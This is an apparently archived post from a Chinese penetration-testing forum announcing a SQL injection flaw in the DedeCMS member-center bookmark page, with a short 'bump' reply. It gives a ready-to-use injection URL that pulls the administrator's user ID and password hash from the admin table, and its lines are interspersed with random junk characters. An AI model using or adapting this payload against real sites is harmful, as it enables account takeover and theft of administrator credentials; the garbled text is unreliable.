中国网络渗透测试联盟

标题: DedeCMS会员中心书签管理SQL注射漏洞 [打印本页]
作者: admin    时间: 2012-12-31 09:21
标题: DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
$ m3 \. l6 a1 l$ u* n5 }' T. t( b4 |需要magic_quotes_gpc = Off
) L) J' h0 T3 ?3 o, z会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.# o3 B3 f% A* k0 ?  g
4 O/ v; q& a  b3 d" R0 [' I: n
DedeCMS会员中心书签管理SQL注射漏洞- Q% `/ \& g' k% B% i
成功利用该漏洞可获得管理员密码
* L- v$ V2 |7 C
- J" J3 `0 Q6 r( S4 m5 h会员登录后可以执行SQL语句查询数据库任意内容如管理员密码# V8 \  B0 J7 `# |3 G
8 @/ ?; Q$ \3 z, A  `
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r9 W. p! A5 g* H" v. q( {. V
作者: kook    时间: 2013-1-10 01:33
#89 顶起。



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2